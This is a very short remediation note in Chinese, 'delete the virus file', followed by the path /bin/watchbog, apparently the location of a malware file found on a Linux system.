删除掉病毒文件
/bin/watchbog